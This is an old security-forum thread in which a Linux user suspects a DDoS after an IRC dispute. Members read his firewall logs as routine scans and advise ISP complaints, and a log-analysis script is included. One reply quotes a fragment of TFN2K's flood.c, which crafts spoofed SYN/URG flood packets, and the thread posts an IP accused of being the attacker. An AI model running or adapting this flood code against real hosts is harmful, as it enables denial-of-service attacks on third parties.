found my IP and knocking me off IRC
  1. #1
    gore (AO BOFH: Luser Abuser BModeratorFH)
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177

    found my IP and knocking me off IRC

    Today I was in a chat room and this script kiddie got my IP. I keep getting disconnected from chat, and he also said he used my PC in a SYN flood against routers or something. I also got knocked off AIM, and when I tried connecting it said my password was invalid, so I tried again and it worked. Half my list was on away, and everyone on away isn't on now. I'm not sure what's going on. I have SuSE Linux 8.1 Professional and I have the SuSEfirewall running... any ideas? I didn't think you could do that on Linux so fast. My IP doesn't change because I'm on cable, so that's kinda... not cool.

    EDIT: AIM seems fine now, but I didn't think a kiddie could honestly do that with an IP addy. He said something about trying to get me arrested and then said he's just playing, but this is a bit much of a "coincidence": my AIM knocks me off and doesn't wanna work for a sec, and then I get knocked off chat.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween. The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  2. #2
    Super Moderator
    Know-it-All Master Beaver

    Join Date
    Jan 2003
    Posts
    3,914
    Did you see/log any activity on a packet logger/IDS? Do you have any services running that could be exploited? Did you notice a bandwidth loss (was it a ping timeout from IRC?) or did you just lose the connections?

    My initial response without having too much to go on would be that it's some script kiddie who's either got himself a few DDoS servers set-up or else has a half-decent Smurf broadcast list.

  3. #3
    gore (AO BOFH: Luser Abuser BModeratorFH)
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Yea, he's got about 1,000 DDoS setups. I don't have any servers on here because I don't use it for anything like that. I started up KSnuffle and there was a lot of activity, but it was from my ISP I think; it was showing up as from my ISP. I'm gonna check out the logs in a sec here.

  4. #4
    Senior Member
    Join Date
    Apr 2002
    Posts
    1,049
    Hmm, sounds like he could be SYN flooding you, and that's why you may be getting knocked off IRC and gAIM. Try logging what's happening. A temporary solution would be Firestarter, which logs in real time, and you will be able to drop packets from offending IPs.
    By the sacred **** of the sacred psychedelic tibetan yeti ....We'll smoke the chinese out
    The 20th century pharaohs have the slaves demanding work
    http://muaythaiscotland.com/

  5. #5
    gore (AO BOFH: Luser Abuser BModeratorFH)
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    *EDIT: I just saw prodikal's post. When I boot up, it says it starts SYN flood protection. Also, right now I'm not on Gaim, I'm on AIM from AOL; I downloaded the new AIM for Linux they have. And also thanks, guys, for checking this out.

    Here's a part from my logs.
    I changed the destination IP for security reasons.

    Apr 12 04:48:51 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=changed.for.securityReasons LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54207 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A916520000000001030300)

    Apr 12 04:48:54 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=same LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54208 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A9177E0000000001030300)

    Apr 12 04:49:00 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=same LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54209 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A919D60000000001030300)

    Apr 12 04:49:12 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=210.184.76.245 DST=same LEN=60 TOS=0x00 PREC=0x00 TTL=42 ID=54210 DF PROTO=TCP SPT=57725 DPT=21 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101080A00A91E860000000001030300)


    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61860 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12543 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21451 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28973 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53667 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST=same LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2472 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:52 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31650 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61861 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12544 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21452 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28974 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2473 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53668 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:49:55 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31651 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:00 linux /USR/SBIN/CRON[8871]: (root) CMD ( /usr/lib/sa/sa1 )

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61862 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12545 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21453 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28975 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2474 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53669 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:01 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31652 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=61863 DF PROTO=TCP SPT=36451 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=12546 DF PROTO=TCP SPT=36452 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=21454 DF PROTO=TCP SPT=36453 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=28976 DF PROTO=TCP SPT=36454 DPT=6588 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=2475 DF PROTO=TCP SPT=36457 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=53670 DF PROTO=TCP SPT=36458 DPT=23 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:50:13 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=200.69.212.165 DST= LEN=52 TOS=0x00 PREC=0x00 TTL=39 ID=31653 DF PROTO=TCP SPT=36459 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40101040201030300)

    Apr 12 05:51:30 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=57440 DF PROTO=TCP SPT=57143 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A33690000000001030300)

    Apr 12 05:51:30 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=29762 DF PROTO=TCP SPT=57144 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A33690000000001030300)

    Apr 12 05:51:30 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=58250 DF PROTO=TCP SPT=57145 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A33690000000001030300)

    Apr 12 05:51:33 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=57441 DF PROTO=TCP SPT=57143 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A39690000000001030300)

    Apr 12 05:51:33 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=29763 DF PROTO=TCP SPT=57144 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A39690000000001030300)

    Apr 12 05:51:33 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=58251 DF PROTO=TCP SPT=57145 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A39690000000001030300)

    Apr 12 05:51:39 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=57442 DF PROTO=TCP SPT=57143 DPT=3128 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A45690000000001030300)

    Apr 12 05:51:39 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=29764 DF PROTO=TCP SPT=57144 DPT=8080 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A45690000000001030300)

    Apr 12 05:51:39 linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= MAC=00:04:e2:1d:90:85:00:09:7b:8e:60:8c:08:00 SRC=216.65.55.2 DST= LEN=60 TOS=0x00 PREC=0x00 TTL=37 ID=58252 DF PROTO=TCP SPT=57145 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 OPT (020405B40402080A3B0A45690000000001030300)

    EDIT2:

    Hmmm, his IP is

    66.169.81.235.... He challenged me thinking I'd retaliate... oh well, at least I got an IP out of it. It is actually his, but I'm not sure what good that'll do; I've never had a thing like this happen before.

  6. #6
    Don't retaliate, gore. That will get you in trouble instead of him.

    Since you have got his IP, find out what you can about him. He could already have rooted that box, so it might belong to an 'innocent' victim (they should already be firewalled; that's why I used the '').

    Report it to the appropriate authorities. Also notify your own ISP of this behaviour.

  7. #7
    MrLinus (Just a Virtualized Geek)
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    File a complaint with his ISP. I had that happen once and the attacker actually got blackballed from area ISPs (granted this was in the early 90s). It looks like it is a SYN/URG attack. Could it be a DRDoS or a DDoS? I'd think that'd be the only way he'd be able to fully wipe you out.

    The closest named attack I could find is a Kamikaze Packet, which seems to be a variation of the Christmas tree scan.

    Bingo! (I was researching as I was writing this) -- Trinoo 2k (TFN2K). It's a packet of that, I believe. One of the portions of the TFN2K has something called flood.c. This has the following:

    {
    struct sa sin;
    struct ip *ih = (struct ip *) synb;
    struct tcp *th = (struct tcp *) (synb + sizeof (struct ip));
    ih->ver = 4;
    ih->ihl = 5;
    ih->tos = 0x00;
    ih->tl = sizeof (ih) + sizeof (th);
    ih->id = htons (getrandom (1024, 65535));
    ih->off = 0;
    ih->ttl = getrandom (200, 255);
    ih->pro = TCP;
    ih->sum = 0;
    ih->src = k00lip ();
    ih->dst = victim;
    th->src = htons (getrandom (0, 65535));
    if (port > 0)
    th->dst = htons (port);
    else
    th->dst = htons (getrandom (0, 65535));
    th->seq = htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8));
    th->ack = htons (getrandom (0, 65535));
    th->flg = SYN | URG;
    th->win = htons (getrandom (0, 65535));
    th->sum = 0;
    th->urp = htons (getrandom (0, 65535));
    th->sum = ip_sum ((u16 *) synb, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1);
    ih->sum = ip_sum ((u16 *) synb, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1);
    sin.fam = AF_INET;
    sin.dp = th->dst;
    sin.add = ih->dst;
    sendto (rawsock, synb, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sin, sizeof (sin));
    }
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  8. #8
    Member
    Join Date
    Oct 2001
    Posts
    76
    That is not the actual attack. The first scan is a scan for an FTP server, possibly from a compromised host. The IP address resolves to quadzilla.alcatraz-media.com. Their web site is just a blank black page, which seems strange for a live web site.

    The second scan is just a standard proxy scan, probably from the IRC network you connected to. That IP resolves to several hostnames, one of which is a bit of a giveaway. Telnetting to port 6667 of this host confirms this:
    host 200.69.212.165
    165.212.69.200.in-addr.arpa domain name pointer www.isecom.com.ar.
    165.212.69.200.in-addr.arpa domain name pointer www.isecommayorista.com.ar.
    165.212.69.200.in-addr.arpa domain name pointer chat.socios.mutualmas.com.ar.
    165.212.69.200.in-addr.arpa domain name pointer foro.socios.mutualmas.com.ar.

    The final scan is also a proxy scan, but the address doesn't resolve to any hostname. It is based in the far east, and the only explanation I can think of is that the IRC network you use scans you from 2 locations to ensure you don't have an undetected open proxy. This address has something running on port 6667, but I don't really know what it is. It doesn't seem to be an IRC server, but I could be wrong...

    As for the attacker, the best solution is definitely to report him to his ISP. This will get better results than retaliating, possibly against the wrong host. Getting knocked offline could've just been the attacker doing an nmap scan against you. I know for certain some IRC clients drop out with nmap scans; I accidentally found that out when someone requested I scan them.

    More likely though, he DDoS'ed you, and either way, it's worth complaining to his ISP. Provide them with IRC logs, /whois output so they can see his hostname (provided he's not using a bouncer), firewall logs, and any other evidence you might have. With evidence, the more the merrier, provided it's relevant.
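The reading Beryllium9 gives of the firewall log (one source retrying port 21 with TCP backoff, two others probing the usual proxy ports) can be checked mechanically. The script below is an added example, not code from the thread or from SuSE; it assumes the SuSE-FW-DROP-DEFAULT field layout shown in the log above, a hand-picked PROXY_PORTS set, and a per-source SYN rate threshold (flood_rate) that separates a scan from the kind of flood the thread is worried about. The sample events are condensed from the thread's own log lines.

```python
import re
from collections import defaultdict
from datetime import datetime

# Fields we need from a SuSE-FW-DROP-DEFAULT line written by SuSEfirewall2 via the kernel log.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: SuSE-FW-DROP-DEFAULT "
    r".*?\bSRC=(?P<src>\S+) .*?\bPROTO=(?P<proto>\S+) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)")

# Template for constructed sample lines: same layout as the thread's log, MAC and OPT fields omitted.
LINE_TMPL = ("Apr 12 %s linux kernel: SuSE-FW-DROP-DEFAULT IN=eth0 OUT= SRC=%s DST= LEN=52 "
             "TOS=0x00 PREC=0x00 TTL=39 ID=%d DF PROTO=TCP SPT=%d DPT=%d WINDOW=5840 RES=0x00 SYN URGP=0")

# Sample events (time, SRC, ID, SPT, DPT) condensed from the three sources in the thread's log.
SAMPLE_EVENTS = [
    ("04:48:51", "210.184.76.245", 54207, 57725, 21),    # one FTP connection attempt ...
    ("04:48:54", "210.184.76.245", 54208, 57725, 21),    # ... retransmitted after 3 s
    ("04:49:00", "210.184.76.245", 54209, 57725, 21),    # ... and after 6 s: TCP backoff, not a flood
    ("05:49:52", "200.69.212.165", 61860, 36451, 80),    # several ports in one second, one SPT each:
    ("05:49:52", "200.69.212.165", 12543, 36452, 8080),  # the open-proxy check IRC networks run
    ("05:49:52", "200.69.212.165", 21451, 36453, 3128),
    ("05:49:52", "200.69.212.165", 53667, 36458, 23),
    ("05:49:55", "200.69.212.165", 61861, 36451, 80),    # retransmit of the port-80 attempt
    ("05:51:30", "216.65.55.2", 57440, 57143, 3128),     # second proxy scanner
    ("05:51:30", "216.65.55.2", 29762, 57144, 8080),
    ("05:51:30", "216.65.55.2", 58250, 57145, 80),
]
SAMPLE_LOG = "\n".join(LINE_TMPL % e for e in SAMPLE_EVENTS)
SAMPLE_LOG += "\nApr 12 05:50:00 linux /USR/SBIN/CRON[8871]: (root) CMD ( /usr/lib/sa/sa1 )"  # noise

# Ports an IRC network's open-proxy checker typically probes (assumption, drawn from the log above).
PROXY_PORTS = {23, 80, 1080, 3128, 6588, 8000, 8080}


def parse_drops(text):
    """Return one dict per SuSE-FW-DROP-DEFAULT line; any other syslog line is skipped."""
    matches = (LINE_RE.search(line) for line in text.splitlines())
    return [{"ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"), "src": m["src"], "proto": m["proto"],
             "spt": int(m["spt"]), "dpt": int(m["dpt"]), "syn": " SYN " in m.string}
            for m in matches if m]


def summarise(packets, flood_rate=100.0):
    """Group dropped TCP SYNs by source address and say what each source looks like."""
    by_src = defaultdict(list)
    for p in packets:
        if p["proto"] == "TCP" and p["syn"]:
            by_src[p["src"]].append(p)
    report = {}
    for src, pkts in by_src.items():
        dports = sorted({p["dpt"] for p in pkts})
        attempts = {(p["spt"], p["dpt"]) for p in pkts}   # same SPT/DPT again = kernel retransmit
        span = (max(p["ts"] for p in pkts) - min(p["ts"] for p in pkts)).total_seconds()
        rate = len(pkts) / max(span, 1.0)                 # SYNs per second over the burst
        if rate >= flood_rate:
            verdict = "possible SYN flood"
        elif len(dports) >= 3 and set(dports) <= PROXY_PORTS:
            verdict = "open-proxy scan"
        elif len(dports) == 1:
            verdict = "single-service probe on port %d" % dports[0]
        else:
            verdict = "port scan"
        report[src] = {"packets": len(pkts), "attempts": len(attempts), "retransmits": len(pkts) - len(attempts),
                       "dports": dports, "span_s": span, "verdict": verdict}
    return report
```

Run summarise(parse_drops(SAMPLE_LOG)) and each of the three sources gets the verdict Beryllium9 gave it by hand; a real flood from one fixed source shows up as hundreds of SYNs inside a second and trips the rate check instead.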

  9. #9
    Is this the source code for a flood? What is it?

  10. #10
    Kwiep
    Join Date
    Aug 2001
    Posts
    924
    I agree with Beryllium9 on the logged packets: they're either a really primitive portscan or just a proxy scan. I don't know if you got other things during the attack (if it was an attack even). I'd like to know some more about the person itself. What was the chat room you were talking about? What made you sure it was a script kiddie? I know it's easy to download some scripts and use them etc., but there are also still people like blackhats. Those also have skill in malicious actions, but they won't bother about you if you didn't do anything to them... Do you know for sure you were attacked at all? If the guy has 1,000 DDoS setups or whatever, it means you just can't reach anything, because your bandwidth gets spoiled. Unless it is fired to exploit something, nothing will crash. You use Linux and you have a firewall. Didn't Gaim or anything just crash on you or something?

    Ow my post is a mess again...
    Double Dutch
